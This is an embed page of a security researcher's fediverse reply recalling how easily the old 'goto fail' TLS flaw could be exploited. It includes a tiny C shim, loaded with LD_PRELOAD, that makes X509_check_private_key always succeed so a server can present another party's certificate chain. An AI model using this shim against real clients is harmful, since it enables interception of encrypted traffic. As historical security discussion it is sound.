Embed Notice

HTML Code

<blockquote style="position: relative; padding-left: 55px;"><section><a href="https://infosec.exchange/users/ryanc/statuses/111857587499261429">Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Friday, 02-Feb-2024 03:15:34 JST</a><a href="https://infosec.exchange/@ryanc" title="ryanc@infosec.exchange"><img src="https://gnusocial.jp/avatar/174285-48-20231204225121.webp" width="48" height="48" alt="Ryan Castellucci :nonbinary_flag:" style="position: absolute; left: 0; top: 0;">Ryan Castellucci :nonbinary_flag:</a><div><a href="https://infosec.exchange/@lmk/111857042835952844" rel="in-reply-to">in reply to</a><ul><li><li><a href="https://gnusocial.jp/user/106256" title="womble@infosec.exchange">Matt Palmer</a></li><li><a href="https://gnusocial.jp/user/212632" title="lmk@infosec.exchange">Loren Kohnfelder</a></li></ul></div></section><article><p><a href="https://infosec.exchange/@lmk">@lmk</a> <a href="https://chaos.social/@Natanox" rel="nofollow noreferrer">@Natanox</a> <a href="https://infosec.exchange/@womble">@womble</a> </p><p>I forgot how hilariously trivial it was.</p><p>All one had to do was generate a private key of matching size and algorithm to use with the certificate chain, and restrict to vulnerable cipher suites.</p>/*<br>To build:<br>gcc -shared -fPIC -o libgotofail.so gotofail.c<br>To use:<br>LD_PRELOAD=./libgotofail.so PROGRAM AND ARGUMENTS GO HERE<br>*/<br>#define _GNU_SOURCE<br>int X509_check_private_key(void *a, void *b) { return 1; }<br></article><footer><a rel="bookmark" href="https://gnusocial.jp/conversation/2663013#notice-5281078">In conversation</a><time datetime="2024-02-02T03:15:34+09:00" title="Friday, 02-Feb-2024 03:15:34 JST">about 10 months ago</time> <span>from <span><a href="https://infosec.exchange/@ryanc/111857587499261429" rel="external" title="Sent from infosec.exchange via ActivityPub">infosec.exchange</a></span></span><a href="https://infosec.exchange/@ryanc/111857587499261429">permalink</a><h4>Attachments</h4><ol><li><label><a rel="external" href="https://gnusocial.jp/attachment/2198439">Untitled attachment</a></label><br></li></ol></footer></blockquote>

Corresponding Notice

Embed this notice
Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Friday, 02-Feb-2024 03:15:34 JSTRyan Castellucci :nonbinary_flag:
in reply to
@lmk @Natanox @womble
I forgot how hilariously trivial it was.
All one had to do was generate a private key of matching size and algorithm to use with the certificate chain, and restrict to vulnerable cipher suites.
/*
To build:
gcc -shared -fPIC -o libgotofail.so gotofail.c
To use:
LD_PRELOAD=./libgotofail.so PROGRAM AND ARGUMENTS GO HERE
*/
#define _GNU_SOURCE
int X509_check_private_key(void *a, void *b) { return 1; }
In conversationabout 10 months ago from infosec.exchangepermalink
Attachments
1. Untitled attachment

Public

Embed Notice

HTML Code

Corresponding Notice